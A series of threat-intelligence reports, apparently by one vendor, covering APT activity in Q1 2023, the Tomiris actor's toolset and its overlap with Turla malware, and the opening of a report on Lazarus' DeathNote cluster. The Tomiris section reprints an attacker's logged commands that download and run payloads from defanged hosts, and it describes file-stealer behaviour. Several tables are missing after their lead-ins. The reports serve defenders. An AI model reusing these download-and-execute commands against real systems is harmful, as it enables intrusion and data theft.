In late December last year, we spotted malware that relies on Microsoft Exchange for command-and-control (C2) communication and data exfiltration. Further analysis of the samples revealed it to be a variant of Oilrig’s Lookout malware, which we had reported earlier in 2020 and which targeted a ministry of foreign affairs entity in the Middle East and its branches worldwide. The new variant is also .NET-based, with several modifications in its execution flow compared to the original version; but still utilizing Exchange Web Services (EWS) via the victim’s mailbox for operations. Interestingly, one of the tools used during the intrusion is capable of informing the threat actor of password changes for the target organization’s users. This technique allows for stealthy, persistent access using valid credentials. The threat actor utilized embedded Proton Mail and Gmail addresses for data exfiltration. By analyzing the Proton Mail GPG signatures, we were able to determine that these email addresses were created on November 30, 2022, indicating that this is a recent campaign. While the initial method of entry remains uncertain, our analysis of the malware and tools used suggest that the threat actor likely continues to operate using credentials obtained from previous intrusions, which we found in one of the tools used in this campaign.

We spotted another intrusion-set and malware samples affecting an IT company in the Middle East since early August 2022. We found evidence to suggest, with medium confidence, that the IT company intrusion is linked to OilRig and its recent attack. The threat actor employed a typical Word document containing malicious macros, utilizing a job recruitment theme, to deliver PowerShell-based malware implants that collect sensitive information, including user and server credentials. Putting this into context, the threat actor could abuse the collected credentials to exploit the supply-chain relationship and compromise the IT company’s clients.

In January, we identified new malware written in the .NET language for remote console command execution that was used in a campaign dating back to December 2022. Further investigation led us to uncover what appears to be a new malicious actor, which we dubbed Trila, targeting Lebanese government entities. This actor’s toolset primarily consists of simple, homebrewed malware that enables them to remotely execute Windows system commands on infected machines. The information gathered is then exfiltrated to a legitimate interact.sh project instance that serves as a C2. In addition to the .NET malware, we also discovered Go and Rust variants of a simple, custom SOCKS proxy tool used to redirect C2 communications within the victims’ environment.

LoneZerda is an APT threat actor that is believed to have originated from Libya, with evidence of activity dating back to 2017. The actor was first publicly disclosed by Checkpoint in July 2019 and is known to use politically themed Facebook pages to trick victims into downloading and executing malware. Our findings indicate that the group was targeting diplomatic entities in countries beyond the initially reported scope (i.e., Libya), but still primarily within the Middle East. We identified indicators that the keylogging module used by the actor was still active on the computers of high-profile victims at the time we wrote our private report, although the attacker’s infrastructure had been sinkholed in March 2020. Our report sheds light on various intrusion aspects not covered by publicly available research to help organizations in the same industry verticals or in the same region to protect, detect and hunt for this activity.

Southeast Asia and Korean Peninsula

We published our analysis of observed activity over the past year and a half related to the Origami Elephant threat actor. The group has been found to use two distinct attack chains; one for deploying the known Agent K11 framework and the other for deploying the RTY framework (a successor of YTY AES). Most of the initial stages rely on macro scripts, which retain traditional script structure but also introduce new tricks. Additionally, two new simple downloaders, MinHus and Stage, were identified. These payloads are new versions of the Simple Uploader. The group has also been observed starting to use more complex algorithms to obfuscate strings, instead of simple XOR or addition and subtraction, in an effort to evade detection and attribution.

We recently investigated ScarCruft’s new malware strains and C2 server data. ScarCruft focuses on spying on individuals related to the North Korean government (including what appears to be North Korean workers abroad) and uses tools such as Chinotto for its operations. Our research uncovered a new malware strain developed in the Go language using a legitimate cloud messaging service (ably.com) as a C2 mechanism for the first time. Our monitoring of this ably.com channel shed unprecedented light on ScarCruft activities. The attackers tried to spread additional scripts for persistence and new payloads using their malware. Compromised web servers were used to host these payloads; and we detected suspicious command files on the C2 servers. We captured these commands and identified a new final payload, SidLevel, with extensive capabilities to steal sensitive information from victims. We also got access to data stolen from ScarCruft’s victims. The group continues to target individuals related to North Korea, including novelists, academic students, and also business people who appear to send funds back to North Korea.

We observed a Lazarus campaign, active until January 2023, leveraging a backdoored UltraVNC client to deliver an updated BLINDINCAN payload. The payload has new features, including plug-in-based expanding capabilities. Backdooring prominent open-source programs is one of the means that the Lazarus group has been using to deliver its malware. When executed, the compromised application functions normally but covertly collects victim information and transmits it to the C2 servers. Our telemetry shows evidence of a memory-resident payload being retrieved by the backdoored client. The delivered payload was identified as BLINDINCAN, which we have seen being delivered as second-stage malware before. This updated version of BLINDINCAN shares similar characteristics with previous iterations, such as C2 communication, encryption methods and infection procedure. However, it introduced new features, including plug-in-based expanding capabilities. Analyzing and cracking the Trojanized application’s communications, we discovered information about possible victims in the manufacturing and real-estate sectors in India as targets. Additional analysis of the C2 servers, compromised since early 2020, suggests additional targeting of telecoms companies in Pakistan and Bulgaria. We believe that this campaign is not limited to these countries and sectors.

DTrack is a backdoor that has been used by Andariel (aka StonedFly and Silent Chollima), a subset of Lazarus, for almost a decade in a wide variety of attacks, including deploying ransomware as well as espionage malware. In our previous publication about DTrack, we discussed how the backdoor evolved from its previous versions to the current version in use, as well as the new victimology. In our latest private report, we revisited a campaign from 2022 and expanded on the commands the attackers used to deploy DTrack and the accompanying post-exploitation tools and malware (e.g., 3proxy and Yamabot) deployed thereafter. We identified that the attackers probably exploited servers running vulnerable versions of Log4j to gain an initial foothold, as others have reported. Furthermore, investigating the attacker’s infrastructure helped connect additional Yamabot infections with this incident. We identified several target profiles for related Yamabot deployments, all operating in the scientific research field (biomedical, genetics and soil sciences, and energy).

Other interesting discoveries

In March, we discovered a new malware strain actively targeting a government entity in Pakistan. We designated this malware “DreamLand”. The malware is modular and utilizes the Lua scripting language in conjunction with its Just-in-Time (JIT) compiler to execute malicious code that is difficult to detect. It also features various anti-debugging capabilities and employs Windows APIs through Lua FFI, which utilizes C language bindings to carry out its activities. This is the first time we have seen Lua used by an APT threat actor since its use by AnimalFarm and Project Sauron.

Final thoughts

While the TTPs of some threat actors remain consistent over time, relying heavily on social engineering as a means of gaining a foothold in a target organization or compromising an individual’s device, others refresh their toolsets and extend the scope of their activities. Our regular quarterly reviews are intended to highlight the key developments of APT groups.

Here are the main trends that we’ve seen in Q1 2023:

• Established threat actors such as Turla, MuddyWater, Winnti, Lazarus and ScarCruft continue to develop their toolsets.
• There have also been campaigns from newly discovered threat actors such as Trila.
• We continue to see threat actors using a variety of different programming languages, including Go, Rust and Lua.
• APT campaigns continue to be very geographically dispersed. This quarter, we have seen actors focus their attacks on Europe, the US, the Middle East and various parts of Asia.
• The targets chosen by APT threat actors are equally diverse. They include government and diplomatic bodies, aviation, energy, manufacturing, real estate, finance, telecoms, scientific research, IT and gaming sectors.
• Geo-politics remains a key driver of APT development and cyber-espionage continues to be a prime goal of APT campaigns.

As always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.

Disclaimer: when referring to APT groups as Russian-speaking, Chinese-speaking or “other-speaking” languages, we refer to various artefacts used by the groups (such as malware debugging strings, comments found in scripts, etc.) containing words in these languages, based on the information we obtained directly or that is otherwise publicly known and widely reported. The use of certain languages does not necessarily indicate a specific geographic relation, but rather points to the languages that the developers behind these APT artefacts use.

Introduction

We introduced Tomiris to the world in September 2021, following our investigation of a DNS-hijack against a government organization in the Commonwealth of Independent States (CIS). Our initial report described links between a Tomiris Golang implant and SUNSHUTTLE (which has been associated to NOBELIUM/APT29/TheDukes) as well as Kazuar (which has been associated to Turla); however, interpreting these connections proved difficult.

We continued to track Tomiris as a separate threat actor over three new attack campaigns between 2021 and 2023, and our telemetry allowed us to shed light on the group. In this blog post, we’re excited to share what we now know of Tomiris with the broader community, and discuss further evidence of a possible connection to Turla.

Actor profile

• Tomiris focuses on intelligence gathering in Central Asia. Tomiris’s endgame consistently appears to be the regular theft of internal documents.
• The threat actor targets government and diplomatic entities in the CIS. The occasional victims discovered in other regions (such as the Middle East or South-East Asia) turn out to be foreign representations of CIS countries, illustrating Tomiris’s narrow focus.
• It is characterized by its tendency to develop numerous low-sophistication “burner” implants in a variety of programming languages that are repeatedly deployed against the same targets, using elementary but efficient packaging and distribution techniques. Tomiris occasionally leverages commercial or open-source RATs.
• Language artifacts discovered in Tomiris’s implant families and infrastructure from distinct campaigns all indicate that the threat actor is Russian-speaking.
• Overall, Tomiris is a very agile and determined actor, open to experimentation – for instance with delivery methods (DNS hijacking) or command and control (C2) channels (Telegram).

The following map shows the countries where we detected Tomiris targets (colored in green: Afghanistan and CIS members or ratifiers). It is worth noting that while we identified a few targets in other locations, all of them appear to be foreign diplomatic entities of the colored countries:

Tomiris’s polyglot toolset

Tomiris uses a wide variety of malware implants developed at a rapid pace and in all programming languages imaginable. We hypothesize that the general aim is to provide operators with “full-spectrum malware” in order to evade security products. In fact, on several occasions we observed the actor persistently cycling through available malware strains until one of them was finally allowed to run on victim machines.

Tools used by Tomiris fall into three categories:

• Downloaders, rudimentary malicious programs whose role is to deploy a backdoor or required additional legitimate tools.
• Backdoors, whose feature set is typically limited to reconnaissance, command execution, file download and file upload.
• File stealers specifically built to exfiltrate documents, often relying on a hardcoded list of file extensions to automatically find recently edited files and upload them to a C2. Some file stealers are backdoor variants and share the same code base.

Tomiris goes after its victims using a wide variety of attack vectors: spear-phishing emails with malicious content attached (password-protected archives, malicious documents, weaponized LNKs), DNS hijacking, exploitation of vulnerabilities (specifically ProxyLogon), suspected drive-by downloads and other “creative” methods (see details of the investigation described below). The following table lists all Tomiris malware families we are aware of:

In addition, Tomiris leveraged open-source or commercially available implants and offensive tools. Notably, the latter were associated with Tomiris because they were downloaded from Tomiris downloader, shared a common C2 with other Tomiris implants, and/or were leveraged to deploy other Tomiris implants:

Relationships between Tomiris tools. Arrows indicate direct execution.

Overall, pieces from the Tomiris toolset appear to be generally interchangeable and don’t appear to be tied to specific campaigns or victims. Operators routinely mix and match the various families, trying to deploy tools (often repeatedly) with little regard for stealth until one doesn’t get caught by antivirus software.

The following paragraphs provide a summary description of the main malware strains used by Tomiris.

Telemiris

Telemiris is a Python backdoor originally packed with PyInstaller (we later identified some Nuitka-packaged samples as well). Its name derives from the fact that it uses Telegram as a C2 channel. After setting up persistence (copying itself under %AppData%/service/ and creating a RUN key entry), the malware enters its main loop where it waits for Telegram messages and replies to them. Supported commands are:

From what we observed, Telemiris is used as a first-stage implant that operators use to deploy other tools such as Roopy, JLORAT, or even the legitimate WinSCP binary, to further exfiltrate files.

Roopy

Written in Pascal, this file stealer crawls the victim’s filesystem at regular intervals and uploads all files of interest to its C2 server. At startup, it wastes CPU cycles on dead code and useless loops, which we assume are for evasion purposes. Roopy then creates its working directory (%AppData%/Microsoft/OneDrive) where it stores the list of already uploaded files (as upload.dat) and a copy of documents waiting to be uploaded (in the backup subfolder).

Then, every 40-80 minutes, Roopy crawls C:\Users and all other drives (D:, E:, …), looks for all documents (.doc, .docx, .xls, .xlsx, .txt, .pdf) modified in the last month, and stages them for upload. Discovered files are collected in ZIP archives up to 5MB in size and sent to the C2 server over plain HTTP using POST requests containing such data as:

{
	"n":"[timestamp]_[part].zip",
	"t":"[computer name]",
	"s": "[timestamp]",
	"b64":"[base64-encoded zip file]"
}

This data format, naming convention as well as the URL scheme used by the C2 server (i.e., /h/pa) are very similar to SBZ filestealer. We identified a number of variants of Roopy where logging can be either enabled or disabled by default, or where the base64 encoding scheme was replaced by a simple subtraction from the bytes of the obfuscated data.

JLORAT

Our first sightings of this Rust malware date back to August 2022. Similar to Telemiris, JLORAT copies itself under %AppData% and sets up persistence via a registry RUN key. It also creates a mutex to ensure atomic execution (“whatever”, as in the default usage example for the “single-instance” Rust library that is embedded). The backdoor starts by gathering information on the victim machine, such as the system information, current user and public IP address. The information is sent via an HTTP POST request to the C2 on a non-standard port (i.e., 9942). Sample data sent by the C2 could be:

{
	"admin": true,
	"cmd": "",
	"cpu_vendor": {
		"brand": "[REDACTED]",
		"cores": 6,
		"cpu_usage": 0,
		"frequency": 2400,
		"name": "CPU 6",
		"vendor_id": "[REDACTED]"
	},
	"hwid": "[REDACTED]",
	"ip": "[REDACTED]",
	"memory": "32.0",
	"resolution": "1280x1024",
	"software": [
		"Microsoft Visual C++ 2005 Redistributable (x64)",
		"[REDACTED, list of further installed software items]"
	],
	"username": "[REDACTED]",
	"version": "Windows 7 Professional"
}

JLORAT then looks for specific keywords in the data returned by the C2 to start processing orders.

Data sent to port 9999 is not passed in a JSON dictionary, but instead follows a specific format:

We also discovered variants of JLORAT bundled with additional modules – effectively turning it into a file stealer we call JLOGRAB. Just like Roopy, JLOGRAB:

• Periodically looks for documents (a combination of.txt, .pdf, .xml, .xlsx, .doc and .docx files depending on the sample)
• Saves the list as %AppData%/temp_id.txt
• Copies discovered documents under %AppData%/transport
• Uploads them to the C2 in ZIP archives.

JLORAT contains traces of Russian language in status messages (“Директория установлена!”, meaning “Directory set”). The source binary also contains metadata indicating some of the source code is stored in a “moduls” folder, which appears to be a misspelling of the English word “modules”, or a poor transliteration of the Russian word “модуль” (pronounced: modul’).

Tomiris’s deployment spree: TunnusSched giveaway

On January 5, 2023, Mandiant released a blog post describing attacks against Ukrainian entities that they attributed to Turla. Let’s start by briefly summing up their findings:

• In September 2022, a threat actor purchased an expired domain name (anam0rph[.]su) that used to be part of a botnet (Andromeda) infrastructure. This allowed them to receive incoming connections from previous, dormant infections and take over a number of machines.
• Victims in Ukraine were infected with KopiLuwak and QUIETCANARY, two malware strains previously associated with Turla.

While publicly available data indeed shows that anam0rph[.]su was re-registered on August 12, 2022, we couldn’t find any link between Andromeda and KopiLuwak from our telemetry. Nevertheless, we had been tracking QUIETCANARY since 2019 under the name “TunnusSched” (not “Tunnus” as Mandiant’s reporting indicates), and decided to take a closer look at samples collected during the same period.

To our great surprise, we discovered one TunnusSched/QUIETCANARY sample (MD5 B38160FC836AD42F1753A0873C844925) had been delivered to a government target in the CIS on September 13, 2022. Our telemetry additionally shows that this TunnusSched malware was deployed…from Tomiris’s Telemiris (MD5 C49DBF390E876E926A338EA07AC5D4A7).

More precisely, on September 13, 2022, around 05:40 UTC, an operator attempted to deploy several known Tomiris implants via Telemiris: first a Python Meterpreter loader, then JLORAT and Roopy. These efforts were thwarted by security products, which led the attacker to make repeated attempts, from various locations on the filesystem:

$> bitsadmin /transfer www /download hxxps://telegram.akipress[.]news/lsasss.rar [REDACTED]\lsasss.rar
$> rar.exe x "[REDACTED]\lsasss.rar" "[REDACTED]\"
$> [REDACTED]\lsasss.exe
$> dir "[REDACTED]\
$> del "[REDACTED]\document.rar"
$> [...]
$> wmic list drives
$> wmic diskdrive get name
$> wmic logicaldisk where drivetype=5 get deviceid, volumename, description
$> wmic logicaldisk where drivetype=3 get deviceid, volumename, description
$> [...]
$> bitsadmin /transfer www /download hxxps://telegram.akipress[.]news/lsasss.rar F:\lsasss.rar
$> rar.exe x "F:\lsasss.rar" "F:\"
$> F:\lsass.exe
$> tasklist | findstr /I "lsasss"

All these attempts ended in failure. After a one-hour pause, the operator tried again at 07:19 UTC, this time using a TunnusSched/QUIETCANARY sample:

curl hxxps://crane[.]mn/wp-content/plugins/jetpack/modules/photon-cdn/EpsonDeviceControl.exe –output [REDACTED]\epsondevicecontrol.exe

The TunnusSched sample was blocked as well, and the operator resumed trying to deploy JLORAT and Roopy samples up to the next day. This activity and brute-force approach to infection is completely consistent with other Tomiris infections we have observed in the past.

Attribution: reading KopiLuwak’s story again

Mandiant noted that some elements of the recent TunnuSched case they analyzed “appear to be a departure from historical Turla operations”, but the use of KopiLuwak and TunnusSched led them to link this activity to Turla anyway. In order to perform a critical analysis of this attribution process, we need to go back in time.

KopiLuwak has belonged to Turla

Kaspersky first reported on KopiLuwak in 2016. Back then, this JavaScript reconnaissance tool was used to deploy ICEDCOFFEE in countries like Greece, Romania and Qatar. We attributed the associated attack campaign to Turla and could not find any reason to believe that was incorrect.

TunnusSched and KopiLuwak are part of the same toolset

Starting from 2019, we discovered additional implant families that were linked to KopiLuwak (and so, to Turla), starting from 2019. The implants were additionally linked together, mainly because they leverage an identical RC4 implementation:

Code similarity between Topinambour (left) and TunnusSched (right)

The RC4 implementation in these samples results in strictly identical .NET bytecode that, as far as we could verify, is unique to Tunnus, TunnusSched and Topinambour.

The fact that all these implants are interconnected leaves little doubt, and Topinambour at least is strongly linked with KopiLuwak. As a result, we (still) believe with high confidence that TunnusSched and KopiLuwak are both part of similar toolsets, starting from 2019 at the latest.

Mandiant’s recent findings also confirm that KopiLuwak and TunnusSched were still part of the same toolset as of September 2022, as they were both deployed against targets in Ukraine during a single operation.

But Tomiris uses TunnusSched

As we recently discovered (and detailed in “Tomiris’s deployment spree: TunnusSched giveaway”), TunnusSched was leveraged by Tomiris against a government target in the CIS in September 2022.

Additionally, we believe with medium confidence the TunnusSched usage described by Mandiant to be part of Tomiris’s operations, because:

• The TunnusSched sample that was leveraged by Tomiris (MD5 B38160FC836AD42F1753A0873C844925) is very similar to the one that was deployed from KopiLuwak as per Mandiant’s reporting (MD5 403876977DFB4AB2E2C15AD4B29423FF). Most notably, they share identical RC4 encryption keys, user agent strings, unused code (the “ServerInfoExtractor” class), PDB root path (“c:\Users\Scott\source\repos\Kapushka.Client\BrowserTelemetry\obj\Release\”, starting with a lowercase “c:”), both have explicit references to VisualStudio 15.7, and a compilation date set to September 2022.
• The TunnusSched sample used by Tomiris and the one referenced by Mandiant were both (only) deployed against targets in the CIS during the same timeframe (September 2022).
• The TunnusSched deployment described by Mandiant involved taking over an extinct Andromeda C2 domain. We first introduced Tomiris as a threat actor who took over legitimate government hostnames to deploy the Tomiris Golang implant, and it has continued to do so. As a result, we believe it is likely Tomiris may have hijacked extinct Andromeda hostnames or domains.

So Tomiris uses KopiLuwak!

As we have already established, TunnusSched and KopiLuwak are part of similar toolsets (starting from 2019 at least). They were also used together during the same operation in September 2022 in the CIS, while TunnusSched was also deployed separately by Tomiris in the CIS – both independently analyzed cases leveraging very similar TunnusSched samples.

As a result, we believe with medium-to-high confidence that both TunnusSched and KopiLuwak are being leveraged by Tomiris. Additionally, we cannot rule out Tomiris having used KopiLuwak as early as 2019, conducting operations that may have been wrongly attributed to Turla back then.

Wait: wouldn’t that mean Tomiris IS Turla?

This entire discussion would be moot if we believed Tomiris to be (a sub-cluster of) Turla – but this is not the case. While our initial blog post introducing Tomiris noted similarities with malware used in the Sunburst attack, we continued to track the two sets of activity separately. Years later, we are convinced that despite possible ties between the two groups, Turla and Tomiris are separate actors. Tomiris is undoubtedly Russian-speaking, but its targeting and tradecrafts are significantly at odds with what we have observed for Turla. In addition, Tomiris’s general approach to intrusion and limited interest in stealth are significantly at odds with documented Turla tradecraft.

It follows that two groups (that we know of) may have used KopiLuwak at different points in time. What are the possible explanations for this?

• It is possible that Turla doesn’t mind using a tool that was burned in 2016 and is still using it in current operations along with new tools.
• Given that KopiLuwak, Tunnus, TunnusSched, etc. are written in JavaScript and .NET, where the source code is essentially provided with the malware, other threat actors may have repurposed these tools and are using them under a false flag.
• Turla shares tool and expertise with Tomiris, or cooperates with Tomiris on joint operations. In this scenario, it might be acceptable for Turla to give away burned tools, or to use old implants that will not disclose current capabilities to their partners.
• Tomiris and Turla rely on a common supplier that provides offensive capabilities. Or maybe Tomiris initially started out as a private outfit writing tools for Turla and is now branching out into the mercenary business. If so, it is entirely possible that Tomiris, using the toolset it developed for Turla, is conducting operations for different customers.

Our assessment is that the first two hypotheses are the least likely and that there exists a form of deliberate cooperation between Tomiris and Turla. Its exact nature is, however, hard to determine with the information we have at hand. In any case, depending on when Tomiris started using KopiLuwak, a number of campaigns and tools believed to be linked to Turla may in fact need to be re-evaluated.

Not only Topinambour, Tunnus, TunnusSched (QUIETCANARY) and RocketMan may have been used by Tomiris in the past (we know this is the case for TunnusSched, and very likely for Tunnus due to the discovery of government victims in Russia in 2019), it could also be the case that these tools are Tomiris’s exclusive property. Looking back, we cannot help but notice that all of these tools were predominantly used in the CIS region, which is consistent with Tomiris’s traditional victimology.

Conclusion

With this report, we hope to alert the community to the dangers of using KopiLuwak and TunnusSched to link cyberattacks to Turla. To the best of our knowledge, this toolset is currently shared between Tomiris and Turla and we cannot rule out that more actors outside our purview have access to it. We expect the attribution of this cluster of activities to remain unclear for the near future.

In the grander scheme of things, this investigation reveals the pitfalls that the information security industry faces when working on cyberattacks. We rely on a knowledge pool generously shared among all participants, yet information decays: what is true today may turn out to be wrong tomorrow. Discovering new, reliable data isn’t enough; existing assumptions also need to be substantiated – which can only happen when vendors publish data. In that spirit, we kindly thank Mandiant for the research they published.

Finally, this investigation illustrates the limits of technical attribution. Looking at infections and malware samples only gets us so far and we are often reminded that APT groups are subject to organizational and political constraints. On rare occasions, we stumble upon a piece of the puzzle that allows us to pierce the veil.

As for the Tomiris mystery, we’ll be eagerly awaiting the next piece.

Indicators of compromise

Telemiris
MD5 edb0c08f8b6bb179b4395d8a95619d07
SHA-1 f8d87d5b251671af624c3eaf7ac5cc42a0acadd0
SHA-256 00466d76832193b3f8be186d00e48005b460d6895798a67bc1c21e4655cb2e62

MD5 c49dbf390e876e926a338ea07ac5d4a7
SHA-1 bc9314760071a4aef12e503104478059808e7047
SHA-256 df75defc7bde078faefcb2c1c32f16c141337a1583bd0bc14f6d93c135d34289

MD5 485a08c6ff6a8b05fab42facc0225035
SHA-1 da6635def86b50a5de25f148426f68d3d8ab450a
SHA-256 fd7fe71185a70f281545a815fce9837453450bb29031954dd2301fe4da99250d

Tomiris Golang implant
MD5 6b567779bbc95b9e151c6a6132606dfe
SHA-1 a0de69ab52dc997ff19a18b7a6827e2beeac63bc
SHA-256 80721e6b2d6168cf17b41d2f1ab0f1e6e3bf4db585754109f3b7ff9931ae9e5b

SBZ filestealer
MD5 51aa89452a9e57f646ab64be6217788e
SHA-1 0b6e1df37ba89d3d35b4b18afc0ffeb46644ff76
SHA-256 cb78495bee37e768ef4566aa1c2cfb5478bae779127430f90c3da75e407350b8

MD5 20c9ca66d2844edb94a623e77accaa5f
SHA-1 752678274224bf9fef83843e44820f6bcd738758
SHA-256 0767806f5734dca1553cae6a835c24a6d92abd678928b64f70dbd8811ed44aca

TunnusSched
MD5 5d6b920fd8f3b5a3a8c9dead25e3a255
SHA-1 902b27a5fd2e5f17e5340e350afa037549ce9faa
SHA-256 0fc624aa9656a8bc21731bfc47fd7780da38a7e8ad7baf1529ccd70a5bb07852

MD5 4452290e674ab521fa0941d45cc6b22f
SHA-1 459b17c42017cfdfc7eb804b5c0ee52aa6035d78
SHA-256 3f94b20cb7f4ff55207660649ebbb02679c991fe03efbcb0bd3840fc7f0bd527

MD5 e59752ffc116388dd863fc2e30e4aaea
SHA-1 98059a86b681b0b8a09a95def3ef874c531b1d66
SHA-256 29314f3cd73b81eda7bd90c66f659235e6bb900e499c9cc7057d10a9083a0b94

Topinambour
MD5 47870ff98164155f088062c95c448783
SHA-1 15e710a107830b193124a6d2bbc785b9383262a9
SHA-256 009406c1c7c0b289a25d44dfaa8364633d9b71df5f3c7a65deec1ef00a8c2ebb

RocketMan
MD5 a80bbd753c07512b31ab04bd5e3324c2
SHA-1 7bb6e4a1ede35867ce5c57b5668f6aacae025b81
SHA-256 046f11a6c561e46e6bf199ab7f50e74a4d2aaead68cdbd6ce44b37b5b4964758

Tunnus
MD5 9be1cccd8e6ff0bd2ad7868a7c1308c0
SHA-1 0be035e2d7180a908566a6bdaa907ed74b08b790
SHA-256 85295ab44d0903a2cf4cbdcae55129a40cf5f7fb7210a304fa91a86929fd2cd9

Roopy
MD5 66357e47bbc2ec5694e2c5de9cc3b9c6
SHA-1 ce9db7dbf3368757c232aa960bbfa7b83278618d
SHA-256 0dfbc54a5a88f27e52807873c20872bc6bf92b822de90545492081c4e4f96778

MD5 d3e1043cf5382e97685340760c9d3d61
SHA-1 90f1e9fb5845f985cd0995c75e0746a8e47cf8e9
SHA-256 9c086f242120be7a9e57e06b75d8ef6f051a77c6339deaeb574e80ee69590111

MD5 0f092bfc9f9adaf93750df4ae3cdc0f7
SHA-1 e2f191b251ba5c57cdbb5a6d3bfab57957900fcf
SHA-256 a4ea3462bd5aedccc783d18d24589018c257b2a6e092164c01de067a8e3cd649

JLORAT
MD5 8674100d43231294b6562717a9ab3a07
SHA-1 f918e5f50bb3b73a732bc9cb3595bff2ea7b761f
SHA-256 296599df29f4ffa9bf753ff9440032d912969d0bab6e3208ab88b350f9a83605

MD5 d09f792e5ea9f1239f3454fd1ce7893c
SHA-1 9902917a3af585e695141caf347a2f19a065a7df
SHA-256 69bb729ff354cd9651f99a05f74f3ea20d483dc8e6e5838e4dd48858fd500d29

Tomiris Downloader
MD5 fd59dd7bb54210a99c1ed677bbfc03a8
SHA-1 292c3602eb0213c9a0123fdaae522830de3fad95
SHA-256 c9db4f661a86286ad47ad92dfb544b702dca8ffe1641e276b42bec4cde7ba9b4

MD5 bcd52718195416b47c3538a89b62c305
SHA-1 5a368354696d06319a050071f48bc6767d92b49a
SHA-256 8391c182588b79697337e401a6424c12b3d707c00c15a17ec59059deedb0e2c4

MD5 daf4f59224cc7c5e94c924f43a76f300
SHA-1 6161aa9d9888472647a9792eead944bfc678c920
SHA-256 8ec159179d49b44849febe7ed522c8fb836d5658ef868db41d2181fb4b1cbd3f

MD5 d1986646b9be824414845f8e98c7961b
SHA-1 98f1a215cd87e08d33f0d2ba13020661e629c6b8
SHA-256 b144229fb62799aa23537eaf0ce267b1445a182c28f4679e8f8234eeb5e603f3

MD5 45a857603e0e72174452fd073ad373de
SHA-1 c1b7547da13b7c78cd6c5c354af945b2eff767c9
SHA-256 e2d4d030542a44a8d4cc8b97da7b26487570dda432a736766dd2ab6d57a3b787

Tomiris .NET Downloader
MD5 11ed3f8c1a8fce3794b650bbdf09c265
SHA-1 4040bb7e4ebc98c22bda98680b207ec89767b759
SHA-256 4f237b5aa3ff4fc4e3014f693c27a1cba94fc24f3a6054c28d090592343c06a2

MD5 92c6d7fb1118d2e276dd4ad878db37f6
SHA-1 53baccf15963dc85447cc822ec95ef8ed0326ac6
SHA-256 358411a3b4a327805d629612b1b64357efe5389e56ddae9128ababbc8a2357a1

MD5 796c232286743b95fed38d9d5c74f879
SHA-1 cac58134db8bb3c6b0d8f21957cadb9110fa3727
SHA-256 65da1696d36da254779a028b881a1890b0b037e7eee8ea0a9446c8bb0729c1cf

Tomiris Download Scheduler
MD5 956cefc9a1759078ccf75b192db10ced
SHA-1 245b78c615c57abaf46235f184a727587c882b69
SHA-256 c5a9be4055e5f00bf3f2e6c57ba1b796157a74406657fd554d69491868cd5925

MD5 67340dba1c379a84df88e639608de310
SHA-1 aa494696a413b652e667cbbb7ccee35a68b45c87
SHA-256 5e66256adbf973f6ab2252c14d6f0d8da2d326f52f6433bcf3a7cd7c60ae8f01

RATel
MD5 d83b31fe5f0144468aad4619c2418ac8
SHA-1 23f388aced4b1732744cbd5fca1a24b8a82c01a9
SHA-256 e152322530819d196fb411a0cb12cf4bcc94975b400a17b95f0fc2e28f6493e5

MD5 447cf4a077f17096ca16a29333b7a046
SHA-1 4a572e67a799ebbb2b9d7260aedb780e3005be51
SHA-256 352f9cd4c14c1002d6c8d902cbca4e96d03a8bb243b33dd192a2260fe66091a1

MD5 10b315fb7d8ba8d69337f04ed3891e75
SHA-1 c56991857a9c09e25f3dd56066b4a322cc5c03d9
SHA-256 4c8eddeab2d40178712685d09da5187b996389fba62c7f9b9635b07060b1e013

Packed Python Meterpreter loader
MD5 322837acdcedc952587e7be9886ddffd
SHA-1 19357154ff3e43c968fd09f61db1e6e8084384fa
SHA-256 98275bfe968d5998230bdf18de1be795b5ad42bd82b5ecb1405b00afba6f533d

MD5 778d491e9742199b558e84a27c559612
SHA-1 66271b2536481a6b2a3ae21412ce5ef50a692cfa
SHA-256 9cd10a2d9db9cf1c5b3454c323fd148f5a322b4100f35e0a73ed4632038631cc

^[1] Name is directly extracted from strings in binary samples. Despite similarity to the “STAITBIZARRE” implant (also sometimes called “SBZ”), it is completely unrelated.

The Lazarus group is a high-profile Korean-speaking threat actor with multiple sub-campaigns. We have previously published information about the connections of each cluster of this group. In this blog, we’ll focus on an active cluster that we dubbed DeathNote because the malware responsible for downloading additional payloads is named Dn.dll or Dn64.dll. This threat is also known as Operation DreamJob or NukeSped. Over the past few years, we have closely monitored the DeathNote cluster, observing a shift in their targets as well as the development and refinement of their tools, techniques, and procedures.

Timeline of DeathNote cluster

In this blog, we will provide an overview of the significant modifications that have taken place within this cluster, both in terms of its technical and strategic aspects.

Beginning of tracking DeathNote

The notorious threat actor Lazarus has persistently targeted cryptocurrency-related businesses for a long time. While monitoring the actor’s activities, we noticed that in one particular case they were using a significantly modified piece of malware. In mid-October 2019, we came across a suspicious document uploaded to VirusTotal. Upon further investigation, we discovered that the actor behind this weaponized document had been using similar malicious Word documents since October 2018. The malware author used decoy documents that were related to the cryptocurrency business such as a questionnaire about buying specific cryptocurrency, an introduction to a specific cryptocurrency, and an introduction to a bitcoin mining company.

Decoy documents

Once the victim opens the document and enables the macro, the malicious Visual Basic Script extracts the embedded downloader malware and loads it with specific parameters. In this initial discovery, the actor used two types of second-stage payload. The first is a manipulated piece of software that contains a malicious backdoor, while the second is a typical backdoor with a multi-stage binary infection process.

Infection procedure

The Trojanized application utilized in the second stage is masquerading as a genuine UltraVNC viewer. If executed without any command line parameters, it will display a legitimate UltraVNC viewer window. However, it carries out a malicious routine when it is spawned with “-s {F9BK1K0A-KQ9B-2PVH-5YKV-IY2JLT37QQCJ}” parameters. The other infection method executes the installer, which creates and registers an injector and backdoor in a Windows service. Finally, the backdoor is injected into a legitimate process (svchost.exe) and initiates a command-and-control (C2) operation. In this infection, the final payload injected into the legitimate process was Manuscrypt. Until this discovery, the Lazarus group had primarily targeted the cryptocurrency business. Our investigation has identified potential compromises of individuals or companies involved in cryptocurrency in Cyprus, the United States, Taiwan and Hong Kong.

Shifting focus to the defense industry

While tracking this campaign, we uncovered a significant shift in the attack’s target along with updated infection vectors in April 2020. Our research showed that the DeathNote cluster was used to target the automotive and academic sectors in Eastern Europe, both of which are connected to the defense industry. At this point, the actor switched all the decoy documents to job descriptions related to defense contractors and diplomatic services.

Decoy documents

